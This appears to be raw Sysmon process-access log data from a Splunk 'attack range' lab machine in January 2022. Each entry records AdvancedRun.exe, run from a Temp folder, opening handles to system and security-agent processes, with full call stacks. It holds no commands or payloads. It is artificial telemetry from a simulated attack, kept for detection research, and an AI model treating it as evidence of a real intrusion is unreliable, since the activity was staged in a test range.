18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004009393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 